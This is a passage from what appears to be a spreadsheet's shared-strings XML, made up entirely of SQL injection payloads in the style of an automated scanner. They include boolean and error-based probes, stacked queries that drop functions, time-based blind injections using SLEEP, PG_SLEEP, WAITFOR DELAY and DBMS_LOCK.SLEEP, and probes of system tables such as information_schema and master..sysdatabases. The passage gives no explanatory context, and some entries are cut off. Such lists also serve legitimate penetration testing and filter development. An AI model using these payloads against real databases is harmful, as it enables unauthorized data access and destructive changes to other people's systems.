    <t>"  )  )   AND 6695 = 6695-- AND   (  (  "YAAp" LIKE "YAAp</t>
  </si>
  <si>
    <t>"  )  )   AND 874 = 1218-- AND   (  (  "iKDC" LIKE "iKDC</t>
  </si>
  <si>
    <t>"  )  )   )  AND 8070 = 9605-- AND   (  (   ( "yozR" LIKE "yozR</t>
  </si>
  <si>
    <t>"  )  )   )  AND 6695 = 6695-- AND   (  (   ( "cepA" LIKE "cepA</t>
  </si>
  <si>
    <t>"  )  )   )  AND 7632 = 2198-- AND   (  (   ( "wrkS" LIKE "wrkS</t>
  </si>
  <si>
    <t>" AND 7295 = 6441-- AND "yOJt" LIKE "yOJt</t>
  </si>
  <si>
    <t>" AND 6695 = 6695-- AND "ivMT" LIKE "ivMT</t>
  </si>
  <si>
    <t>" AND 2390 = 9630-- AND "uGoH" LIKE "uGoH</t>
  </si>
  <si>
    <t xml:space="preserve">ELSE NULL END ) </t>
  </si>
  <si>
    <t xml:space="preserve">, ( SELECT  ( CASE WHEN  ( 8962 = 4905 )  THEN 1 ELSE 1/ ( SELECT 0 )  </t>
  </si>
  <si>
    <t xml:space="preserve">, ( SELECT  ( CASE WHEN  ( 2528 = 2528 )  THEN 1 ELSE 1/ ( SELECT 0 )  </t>
  </si>
  <si>
    <t>, ( SELECT  ( CASE WHEN  ( 874 = 2932 )  THEN 77B4A14B9E00AF083BA88</t>
  </si>
  <si>
    <t>, ( SELECT  ( CASE WHEN  ( 8596 = 8596 )  THEN 77B4A14B9E00AF083BA8</t>
  </si>
  <si>
    <t>, ( SELECT  ( CASE WHEN  ( 6195 = 827 )  THEN 77B4A14B9E00AF083BA88</t>
  </si>
  <si>
    <t>, ( SELECT  ( CASE WHEN  ( 6376 = 6102 )  THEN 77B4A14B9E00AF083BA8</t>
  </si>
  <si>
    <t>, ( SELECT  ( CASE WHEN  ( 1915 = 1915 )  THEN 77B4A14B9E00AF083BA8</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;font color = "green"&gt;&amp;gt;&lt;/font&gt;806DA94B1348 ELSE 1915* ( SELECT 1915 FROM information_schema.tables )  END  )  )  </t>
  </si>
  <si>
    <t>, ( SELECT  ( CASE WHEN  ( 9110 = 6853 )  THEN 77B4A14B9E00AF083BA8</t>
  </si>
  <si>
    <t>, ( SELECT  ( CASE WHEN  ( 8928 = 2979 )  THEN 77B4A14B9E00AF083BA8</t>
  </si>
  <si>
    <t>, ( SELECT  ( CASE WHEN  ( 4055 = 4055 )  THEN 77B4A14B9E00AF083BA8</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;font color = "green"&gt;&amp;gt;&lt;/font&gt;806DA94B1348 ELSE 4055* ( SELECT 4055 FROM mysql.db )  END  )  )  </t>
  </si>
  <si>
    <t>, ( SELECT  ( CASE WHEN  ( 7416 = 4540 )  THEN 77B4A14B9E00AF083BA8</t>
  </si>
  <si>
    <t>, ( SELECT  ( CASE WHEN  ( 7787 = 3593 )  THEN 77B4A14B9E00AF083BA8</t>
  </si>
  <si>
    <t>, ( SELECT  ( CASE WHEN  ( 5461 = 5461 )  THEN 77B4A14B9E00AF083BA8</t>
  </si>
  <si>
    <t>, ( SELECT  ( CASE WHEN  ( 1739 = 9622 )  THEN 77B4A14B9E00AF083BA8</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;font color = "green"&gt;&amp;gt;&lt;/font&gt;806DA94B1348 ELSE 1739* ( SELECT 1739 FROM master..sysdatabases )  END  )  )  </t>
  </si>
  <si>
    <t>, ( SELECT  ( CASE WHEN  ( 8179 = 1251 )  THEN 77B4A14B9E00AF083BA8</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;font color = "green"&gt;&amp;gt;&lt;/font&gt;806DA94B1348 ELSE 1/ ( SELECT 0 FROM DUAL )  END )  FROM DUAL ) </t>
  </si>
  <si>
    <t>, ( SELECT  ( CASE WHEN  ( 2595 = 2595 )  THEN 77B4A14B9E00AF083BA8</t>
  </si>
  <si>
    <t>, ( SELECT  ( CASE WHEN  ( 79 = 3256 )  THEN 77B4A14B9E00AF083BA880</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; IF  (  (  6727 = 1393 ) ,SELECT 6727,DROP FUNCTION uEUW ) ;--</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; IF  (  (  4320 = 1381 ) ,SELECT 4320,DROP FUNCTION yEfs ) ;--</t>
  </si>
  <si>
    <t>' ) ; IF  (  (  3956 = 9820 ) ,SELECT 3956,DROP FUNCTION ikPW ) ;--</t>
  </si>
  <si>
    <t>' ) ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--</t>
  </si>
  <si>
    <t>' ) ; IF  (  (  2562 = 2656 ) ,SELECT 2562,DROP FUNCTION Shrt ) ;--</t>
  </si>
  <si>
    <t>'; IF  (  (  3212 = 555 ) ,SELECT 3212,DROP FUNCTION cldE ) ;--</t>
  </si>
  <si>
    <t>'; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--</t>
  </si>
  <si>
    <t>'; IF  (  (  7163 = 1302 ) ,SELECT 7163,DROP FUNCTION yzSH ) ;--</t>
  </si>
  <si>
    <t>"; IF  (  (  3390 = 5415 ) ,SELECT 3390,DROP FUNCTION dEuM ) ;--</t>
  </si>
  <si>
    <t>"; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--</t>
  </si>
  <si>
    <t>"; IF  (  (  8618 = 7052 ) ,SELECT 8618,DROP FUNCTION HQcS ) ;--</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; IF  (  (  3649 = 6740 ) ,SELECT 3649,DROP FUNCTION yeIt ) ;--  AND</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; IF  (  (  5914 = 7266 ) ,SELECT 5914,DROP FUNCTION aNTv ) ;--  AND</t>
  </si>
  <si>
    <t>; IF  (  (  3940 = 6913 ) ,SELECT 3940,DROP FUNCTION EEIt ) ;--</t>
  </si>
  <si>
    <t>; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--</t>
  </si>
  <si>
    <t>; IF  (  (  7760 = 6252 ) ,SELECT 7760,DROP FUNCTION OCMM ) ;--</t>
  </si>
  <si>
    <t xml:space="preserve">'  )  )   ) ; IF  (  (  9573 = 6860 ) ,SELECT 9573,DROP FUNCTION ZRKQ ) ;--  </t>
  </si>
  <si>
    <t xml:space="preserve">'  )  )   ) ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  </t>
  </si>
  <si>
    <t xml:space="preserve">'  )  )   ) ; IF  (  (  8023 = 6495 ) ,SELECT 8023,DROP FUNCTION AFtG ) ;--  </t>
  </si>
  <si>
    <t xml:space="preserve">'  )  )   ) ; IF  (  (  3573 = 7421 ) ,SELECT 3573,DROP FUNCTION CYbg ) ;--  </t>
  </si>
  <si>
    <t xml:space="preserve">"  )  )   ) ; IF  (  (  9853 = 4362 ) ,SELECT 9853,DROP FUNCTION DGjB ) ;--  </t>
  </si>
  <si>
    <t xml:space="preserve">"  )  )   ) ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  </t>
  </si>
  <si>
    <t xml:space="preserve">"  )  )   ) ; IF  (  (  9382 = 1822 ) ,SELECT 9382,DROP FUNCTION sAYB ) ;--  </t>
  </si>
  <si>
    <t xml:space="preserve">"  )  )   ) ; IF  (  (  4260 = 7518 ) ,SELECT 4260,DROP FUNCTION MFwC ) ;--  </t>
  </si>
  <si>
    <t xml:space="preserve">"  )  )   ) ; IF  (  (  1453 = 4232 ) ,SELECT 1453,DROP FUNCTION LrRY ) ;--  </t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; IF ( 7624 = 2864 )  SELECT 7624 ELSE DROP FUNCTION SeIp;--</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;--</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; IF ( 3126 = 36 )  SELECT 3126 ELSE DROP FUNCTION tTTP;--</t>
  </si>
  <si>
    <t>' ) ; IF ( 4396 = 8126 )  SELECT 4396 ELSE DROP FUNCTION euqW;--</t>
  </si>
  <si>
    <t>' ) ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;--</t>
  </si>
  <si>
    <t>' ) ; IF ( 8258 = 3169 )  SELECT 8258 ELSE DROP FUNCTION ijWM;--</t>
  </si>
  <si>
    <t>'; IF ( 4099 = 5808 )  SELECT 4099 ELSE DROP FUNCTION stVD;--</t>
  </si>
  <si>
    <t>'; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;--</t>
  </si>
  <si>
    <t>'; IF ( 1821 = 396 )  SELECT 1821 ELSE DROP FUNCTION CoBa;--</t>
  </si>
  <si>
    <t>"; IF ( 994 = 4544 )  SELECT 994 ELSE DROP FUNCTION akLs;--</t>
  </si>
  <si>
    <t>"; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;--</t>
  </si>
  <si>
    <t>"; IF ( 1092 = 6136 )  SELECT 1092 ELSE DROP FUNCTION QtdO;--</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )  ; IF ( 3626 = 6944 )  SELECT 3626 ELSE DROP FUNCTION ynFI;-- </t>
  </si>
  <si>
    <t xml:space="preserve">  )  )  ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- </t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   ) ; IF ( 6634 = 5433 )  SELECT 6634 ELSE DROP FUNCTION IwUP;--</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   ) ; IF ( 7492 = 9951 )  SELECT 7492 ELSE DROP FUNCTION tejO;--</t>
  </si>
  <si>
    <t>; IF ( 3473 = 4269 )  SELECT 3473 ELSE DROP FUNCTION wBCt;--</t>
  </si>
  <si>
    <t>; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;--</t>
  </si>
  <si>
    <t>; IF ( 3759 = 2454 )  SELECT 3759 ELSE DROP FUNCTION yaKT;--</t>
  </si>
  <si>
    <t xml:space="preserve">' ) ; IF ( 5129 = 8929 )  SELECT 5129 ELSE DROP FUNCTION GRNj;-- </t>
  </si>
  <si>
    <t xml:space="preserve">' ) ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- </t>
  </si>
  <si>
    <t xml:space="preserve">' ) ; IF ( 6883 = 7962 )  SELECT 6883 ELSE DROP FUNCTION RPOP;-- </t>
  </si>
  <si>
    <t>'  )  )  ; IF ( 2894 = 3546 )  SELECT 2894 ELSE DROP FUNCTION YFNh;--</t>
  </si>
  <si>
    <t>'  )  )  ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;--</t>
  </si>
  <si>
    <t>'  )  )   ) ; IF ( 4377 = 941 )  SELECT 4377 ELSE DROP FUNCTION nhnj;--</t>
  </si>
  <si>
    <t>'  )  )   ) ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-</t>
  </si>
  <si>
    <t>'  )  )   ) ; IF ( 7581 = 1911 )  SELECT 7581 ELSE DROP FUNCTION HgZK;-</t>
  </si>
  <si>
    <t>'; IF ( 50 = 4149 )  SELECT 50 ELSE DROP FUNCTION jnny;-- AND '</t>
  </si>
  <si>
    <t xml:space="preserve">' ) ; IF ( 2113 = 3464 )  SELECT 2113 ELSE DROP FUNCTION PPnd;-- </t>
  </si>
  <si>
    <t xml:space="preserve">' ) ; IF ( 5488 = 5912 )  SELECT 5488 ELSE DROP FUNCTION LHLs;-- </t>
  </si>
  <si>
    <t>'  )  )  ; IF ( 2577 = 4984 )  SELECT 2577 ELSE DROP FUNCTION orsI;--</t>
  </si>
  <si>
    <t>'  )  )  ; IF ( 4533 = 6319 )  SELECT 4533 ELSE DROP FUNCTION Ezao;--</t>
  </si>
  <si>
    <t>'  )  )   ) ; IF ( 9120 = 131 )  SELECT 9120 ELSE DROP FUNCTION Bkow;--</t>
  </si>
  <si>
    <t xml:space="preserve">'  )  )   ) ; IF ( 829 = 8654 )  SELECT 829 ELSE DROP FUNCTION Cqct;-- </t>
  </si>
  <si>
    <t xml:space="preserve">" ) ; IF ( 7718 = 8507 )  SELECT 7718 ELSE DROP FUNCTION Zdpf;-- </t>
  </si>
  <si>
    <t xml:space="preserve">" ) ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- </t>
  </si>
  <si>
    <t xml:space="preserve">" ) ; IF ( 9962 = 8116 )  SELECT 9962 ELSE DROP FUNCTION vliP;-- </t>
  </si>
  <si>
    <t>"  )  )  ; IF ( 3640 = 7437 )  SELECT 3640 ELSE DROP FUNCTION JFrG;--</t>
  </si>
  <si>
    <t>"  )  )  ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;--</t>
  </si>
  <si>
    <t>"  )  )  ; IF ( 4745 = 1440 )  SELECT 4745 ELSE DROP FUNCTION IghH;--</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF ( 2828 = 9878 )  SELECT 2828 ELSE DROP FUNCTION rmwJ;-</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF ( 7567 = 4362 )  SELECT 7567 ELSE DROP FUNCTION fUEA;-</t>
  </si>
  <si>
    <t xml:space="preserve">" ) ; IF ( 1586 = 9408 )  SELECT 1586 ELSE DROP FUNCTION fvlT;-- </t>
  </si>
  <si>
    <t xml:space="preserve">" ) ; IF ( 2541 = 3298 )  SELECT 2541 ELSE DROP FUNCTION cGpY;-- </t>
  </si>
  <si>
    <t>"  )  )  ; IF ( 9412 = 6157 )  SELECT 9412 ELSE DROP FUNCTION cNLI;--</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF ( 3012 = 8411 )  SELECT 3012 ELSE DROP FUNCTION SQgA;-</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF ( 8282 = 5111 )  SELECT 8282 ELSE DROP FUNCTION YtxL;-</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; SELECT SLEEP ( 5 ) ;--</t>
  </si>
  <si>
    <t>' ) ; SELECT SLEEP ( 5 ) ;--</t>
  </si>
  <si>
    <t>'; SELECT SLEEP ( 5 ) ;--</t>
  </si>
  <si>
    <t>"; SELECT SLEEP ( 5 ) ;--</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; SELECT SLEEP ( 5 ) ;--  AND  ( 9544 = 9544</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )  ; SELECT SLEEP ( 5 ) ;--  AND   (  (  7188 = 7188</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   ) ; SELECT SLEEP ( 5 ) ;--  AND   (  (   ( 3128 = 3128</t>
  </si>
  <si>
    <t>; SELECT SLEEP ( 5 ) ;--</t>
  </si>
  <si>
    <t>' ) ; SELECT SLEEP ( 5 ) ;--  AND  ( 'WZHG' = 'WZHG</t>
  </si>
  <si>
    <t>'  )  )  ; SELECT SLEEP ( 5 ) ;--  AND   (  (  'JGxh' = 'JGxh</t>
  </si>
  <si>
    <t>'  )  )   ) ; SELECT SLEEP ( 5 ) ;--  AND   (  (   ( 'VweJ' = 'VweJ</t>
  </si>
  <si>
    <t>'; SELECT SLEEP ( 5 ) ;--  AND 'XKYD' = 'XKYD</t>
  </si>
  <si>
    <t>' ) ; SELECT SLEEP ( 5 ) ;--  AND  ( 'OFLH' LIKE 'OFLH</t>
  </si>
  <si>
    <t>'  )  )  ; SELECT SLEEP ( 5 ) ;--  AND   (  (  'wRQs' LIKE 'wRQs</t>
  </si>
  <si>
    <t>'  )  )   ) ; SELECT SLEEP ( 5 ) ;--  AND   (  (   ( 'PGFH' LIKE 'PGFH</t>
  </si>
  <si>
    <t>'; SELECT SLEEP ( 5 ) ;--  AND 'Wjmk' LIKE 'Wjmk</t>
  </si>
  <si>
    <t>" ) ; SELECT SLEEP ( 5 ) ;--  AND  ( "mnTM" = "mnTM</t>
  </si>
  <si>
    <t>"  )  )  ; SELECT SLEEP ( 5 ) ;--  AND   (  (  "CrmZ" = "CrmZ</t>
  </si>
  <si>
    <t>"  )  )   ) ; SELECT SLEEP ( 5 ) ;--  AND   (  (   ( "pQWf" = "pQWf</t>
  </si>
  <si>
    <t>"; SELECT SLEEP ( 5 ) ;--  AND "wCMU" = "wCMU</t>
  </si>
  <si>
    <t>" ) ; SELECT SLEEP ( 5 ) ;--  AND  ( "fDkZ" LIKE "fDkZ</t>
  </si>
  <si>
    <t>"  )  )  ; SELECT SLEEP ( 5 ) ;--  AND   (  (  "RPYP" LIKE "RPYP</t>
  </si>
  <si>
    <t>"  )  )   ) ; SELECT SLEEP ( 5 ) ;--  AND   (  (   ( "kIPF" LIKE "kIPF</t>
  </si>
  <si>
    <t>"; SELECT SLEEP ( 5 ) ;--  AND "qhQF" LIKE "qhQF</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; SELECT PG_SLEEP ( 5 ) ;--</t>
  </si>
  <si>
    <t>' ) ; SELECT PG_SLEEP ( 5 ) ;--</t>
  </si>
  <si>
    <t>'; SELECT PG_SLEEP ( 5 ) ;--</t>
  </si>
  <si>
    <t>"; SELECT PG_SLEEP ( 5 ) ;--</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; SELECT PG_SLEEP ( 5 ) ;-- AND  ( 2994 = 2994</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )  ; SELECT PG_SLEEP ( 5 ) ;-- AND   (  (  317 = 317</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   ) ; SELECT PG_SLEEP ( 5 ) ;-- AND   (  (   ( 1984 = 1984</t>
  </si>
  <si>
    <t>; SELECT PG_SLEEP ( 5 ) ;--</t>
  </si>
  <si>
    <t>' ) ; SELECT PG_SLEEP ( 5 ) ;-- AND  ( 'ebGH' = 'ebGH</t>
  </si>
  <si>
    <t>'  )  )  ; SELECT PG_SLEEP ( 5 ) ;-- AND   (  (  'QzuU' = 'QzuU</t>
  </si>
  <si>
    <t>'  )  )   ) ; SELECT PG_SLEEP ( 5 ) ;-- AND   (  (   ( 'YSYC' = 'YSYC</t>
  </si>
  <si>
    <t>'; SELECT PG_SLEEP ( 5 ) ;-- AND 'dtJW' = 'dtJW</t>
  </si>
  <si>
    <t>' ) ; SELECT PG_SLEEP ( 5 ) ;-- AND  ( 'SxAR' LIKE 'SxAR</t>
  </si>
  <si>
    <t>'  )  )  ; SELECT PG_SLEEP ( 5 ) ;-- AND   (  (  'NyCQ' LIKE 'NyCQ</t>
  </si>
  <si>
    <t>'  )  )   ) ; SELECT PG_SLEEP ( 5 ) ;-- AND   (  (   ( 'nZMZ' LIKE 'nZMZ</t>
  </si>
  <si>
    <t>'; SELECT PG_SLEEP ( 5 ) ;-- AND 'lYYJ' LIKE 'lYYJ</t>
  </si>
  <si>
    <t>" ) ; SELECT PG_SLEEP ( 5 ) ;-- AND  ( "zimm" = "zimm</t>
  </si>
  <si>
    <t>"  )  )  ; SELECT PG_SLEEP ( 5 ) ;-- AND   (  (  "PxEw" = "PxEw</t>
  </si>
  <si>
    <t>"  )  )   ) ; SELECT PG_SLEEP ( 5 ) ;-- AND   (  (   ( "MPvC" = "MPvC</t>
  </si>
  <si>
    <t>"; SELECT PG_SLEEP ( 5 ) ;-- AND "VyYD" = "VyYD</t>
  </si>
  <si>
    <t>" ) ; SELECT PG_SLEEP ( 5 ) ;-- AND  ( "yoWI" LIKE "yoWI</t>
  </si>
  <si>
    <t>"  )  )  ; SELECT PG_SLEEP ( 5 ) ;-- AND   (  (  "EcqL" LIKE "EcqL</t>
  </si>
  <si>
    <t>"  )  )   ) ; SELECT PG_SLEEP ( 5 ) ;-- AND   (  (   ( "TYVH" LIKE "TYVH</t>
  </si>
  <si>
    <t>"; SELECT PG_SLEEP ( 5 ) ;-- AND "hjJP" LIKE "hjJP</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '</t>
  </si>
  <si>
    <t xml:space="preserve">' ) ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS </t>
  </si>
  <si>
    <t>'; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '</t>
  </si>
  <si>
    <t>"; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )  ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS </t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   ) ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS</t>
  </si>
  <si>
    <t>; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/</t>
  </si>
  <si>
    <t>'  )  )  ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS</t>
  </si>
  <si>
    <t xml:space="preserve">" ) ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS </t>
  </si>
  <si>
    <t>"  )  )  ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; WAITFOR DELAY '0:0:5';--</t>
  </si>
  <si>
    <t>' ) ; WAITFOR DELAY '0:0:5';--</t>
  </si>
  <si>
    <t>'; WAITFOR DELAY '0:0:5';--</t>
  </si>
  <si>
    <t>"; WAITFOR DELAY '0:0:5';--</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; WAITFOR DELAY '0:0:5';-- AND  ( 4912 = 4912</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )  ; WAITFOR DELAY '0:0:5';-- AND   (  (  5564 = 5564</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   ) ; WAITFOR DELAY '0:0:5';-- AND   (  (   ( 8841 = 8841</t>
  </si>
  <si>
    <t>; WAITFOR DELAY '0:0:5';--</t>
  </si>
  <si>
    <t>' ) ; WAITFOR DELAY '0:0:5';-- AND  ( 'VEpw' = 'VEpw</t>
  </si>
  <si>
    <t>'  )  )  ; WAITFOR DELAY '0:0:5';-- AND   (  (  'hHuX' = 'hHuX</t>
  </si>
  <si>
    <t>'  )  )   ) ; WAITFOR DELAY '0:0:5';-- AND   (  (   ( 'pOvi' = 'pOvi</t>
  </si>
  <si>
    <t>'; WAITFOR DELAY '0:0:5';-- AND 'GTqr' = 'GTqr</t>
  </si>
  <si>
    <t>' ) ; WAITFOR DELAY '0:0:5';-- AND  ( 'kesQ' LIKE 'kesQ</t>
  </si>
  <si>
    <t>'  )  )  ; WAITFOR DELAY '0:0:5';-- AND   (  (  'FdJz' LIKE 'FdJz</t>
  </si>
  <si>
    <t>'  )  )   ) ; WAITFOR DELAY '0:0:5';-- AND   (  (   ( 'xpka' LIKE 'xpka</t>
  </si>
  <si>
    <t>'; WAITFOR DELAY '0:0:5';-- AND 'lDTn' LIKE 'lDTn</t>
  </si>
  <si>
    <t>" ) ; WAITFOR DELAY '0:0:5';-- AND  ( "DLYB" = "DLYB</t>
  </si>
  <si>
    <t>"  )  )  ; WAITFOR DELAY '0:0:5';-- AND   (  (  "Ftzv" = "Ftzv</t>
  </si>
  <si>
    <t>"  )  )   ) ; WAITFOR DELAY '0:0:5';-- AND   (  (   ( "VdMz" = "VdMz</t>
  </si>
  <si>
    <t>"; WAITFOR DELAY '0:0:5';-- AND "iiik" = "iiik</t>
  </si>
  <si>
    <t>" ) ; WAITFOR DELAY '0:0:5';-- AND  ( "VqDu" LIKE "VqDu</t>
  </si>
  <si>
    <t>"  )  )  ; WAITFOR DELAY '0:0:5';-- AND   (  (  "YDVJ" LIKE "YDVJ</t>
  </si>
  <si>
    <t>"  )  )   ) ; WAITFOR DELAY '0:0:5';-- AND   (  (   ( "supy" LIKE "supy</t>
  </si>
  <si>
    <t>"; WAITFOR DELAY '0:0:5';-- AND "GGit" LIKE "GGit</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;--</t>
  </si>
  <si>
    <t>' ) ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;--</t>
  </si>
  <si>
    <t>'; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;--</t>
  </si>
  <si>
    <t>"; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;--</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND  ( 8959 = 8959</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )  ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (  4510 = 4510</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   ) ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (   ( 4539 = 4539</t>
  </si>
  <si>
    <t>; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;--</t>
  </si>
  <si>
    <t>' ) ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND  ( 'AQqC' = 'AQqC</t>
  </si>
  <si>
    <t>'  )  )  ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (  'slYg' = 'slYg</t>
  </si>
  <si>
    <t>'; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND 'yhOe' = 'yhOe</t>
  </si>
  <si>
    <t>'  )  )  ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (  'aqRy' LIKE '</t>
  </si>
  <si>
    <t>'  )  )   ) ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (   ( 'dSWE' LIKE</t>
  </si>
  <si>
    <t>'; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND 'ZStZ' LIKE 'ZStZ</t>
  </si>
  <si>
    <t>" ) ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND  ( "VeRu" = "VeRu</t>
  </si>
  <si>
    <t>"  )  )  ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (  "daGQ" = "daGQ</t>
  </si>
  <si>
    <t>"; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND "PEuE" = "PEuE</t>
  </si>
  <si>
    <t>"  )  )  ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (  "ZTFm" LIKE "</t>
  </si>
  <si>
    <t>"  )  )   ) ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (   ( "YlsI" LIKE</t>
  </si>
  <si>
    <t>"; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND "DxUX" LIKE "DxUX</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;--</t>
  </si>
  <si>
    <t>' ) ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;--</t>
  </si>
  <si>
    <t>'; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;--</t>
  </si>
  <si>
    <t>"; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;--</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND  ( 6985 = 6985</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )  ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (  818 = 818</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   ) ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (   ( 9129 = 9129</t>
  </si>
  <si>
    <t>; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;--</t>
  </si>
  <si>
    <t>' ) ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND  ( 'YhdQ' = 'YhdQ</t>
  </si>
  <si>
    <t>'  )  )  ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (  'TUmP' = 'TUmP</t>
  </si>
  <si>
    <t>'; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND 'MBQy' = 'MBQy</t>
  </si>
  <si>
    <t>'  )  )  ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (  'XLwy' LIKE '</t>
  </si>
  <si>
    <t>'  )  )   ) ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (   ( 'OOwv' LIKE</t>
  </si>
  <si>
    <t>'; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND 'ilCp' LIKE 'ilCp</t>
  </si>
  <si>
    <t>" ) ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND  ( "NyyL" = "NyyL</t>
  </si>
  <si>
    <t>"  )  )  ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (  "HKGJ" = "HKGJ</t>
  </si>
  <si>
    <t>"  )  )   ) ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (   ( "pMix" = "pMi</t>
  </si>
  <si>
